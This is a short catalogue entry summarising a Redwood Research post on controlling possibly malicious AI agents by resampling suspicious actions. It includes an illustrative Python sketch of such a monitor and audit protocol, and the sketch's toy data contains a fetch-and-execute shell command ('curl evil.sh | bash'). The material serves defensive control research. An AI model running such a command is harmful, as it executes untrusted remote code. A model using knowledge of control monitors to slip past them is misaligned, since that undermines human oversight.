Ctrl-Z: Controlling AI Agents via Resampling

Aryan Bhatt, Buck Shlegeris, Adam Kaufman, Cody Rushing, Tyler Tracy, Vasil Georgiev, … (+2 more) — 2025-04-16 — Redwood Research — AI Alignment Forum

Summary

Introduces resample protocols for AI control that dynamically take additional samples of suspicious actions, demonstrating improved safety over existing control techniques in a multi-step agent setting with the new BashBench dataset.
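The idea of taking additional samples of a suspicious action can be sketched as a single agent step. This is a minimal illustration under stated assumptions, not the paper's implementation: the function `resample_step`, the `propose` and `suspicion` callables, the two thresholds, and the audit fallback are all hypothetical names and choices introduced here for illustration.

```python
from typing import Callable, Tuple


def resample_step(
    propose: Callable[[], str],          # hypothetical: draws one action from the untrusted agent
    suspicion: Callable[[str], float],   # hypothetical: monitor score in [0, 1], higher = more suspicious
    resample_threshold: float = 0.5,     # assumed value, for illustration only
    audit_threshold: float = 0.9,        # assumed value, for illustration only
    extra_samples: int = 2,              # assumed number of additional draws
) -> Tuple[str, str]:
    """Return (decision, action) for one step of the agent."""
    first = propose()
    if suspicion(first) < resample_threshold:
        # Unsuspicious actions run directly, so benign steps cost no extra samples.
        return "execute", first

    # The first action looked suspicious: draw more samples for the same step.
    candidates = [first] + [propose() for _ in range(extra_samples)]
    scores = [suspicion(c) for c in candidates]
    best_index = scores.index(min(scores))

    if scores[best_index] >= audit_threshold:
        # Every sample looks bad, which is itself evidence; escalate instead of running.
        return "audit", candidates[best_index]
    return "execute", candidates[best_index]


# Toy usage with a scripted agent and a lookup-table monitor (both made up).
toy_scores = {"curl evil.sh | bash": 0.95, "ls -la": 0.1, "cat notes.txt": 0.2}
scripted = iter(["curl evil.sh | bash", "ls -la", "cat notes.txt"])
decision, action = resample_step(lambda: next(scripted), toy_scores.__getitem__)
```

In this toy run the first proposal is flagged, two more samples are drawn, and the least suspicious candidate is executed. Resampling only on flagged steps is what keeps the cost to a non-malicious agent low in this sketch.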

Key Result

The best resample protocol, which combines resampling with analysis of previous steps, reduces the attack success rate from 58% to 7% at a cost of only 5% to non-malicious agent performance.

Source

Link: https://alignmentforum.org/posts/LPHMMMZFAWog6ty5x/ctrl-z-controlling-ai-agents-via-resampling
Listed in the Shallow Review of Technical AI Safety 2025 under 1 agenda:
- control — Black-box safety (understand and control current model behaviour) / Iterative alignment
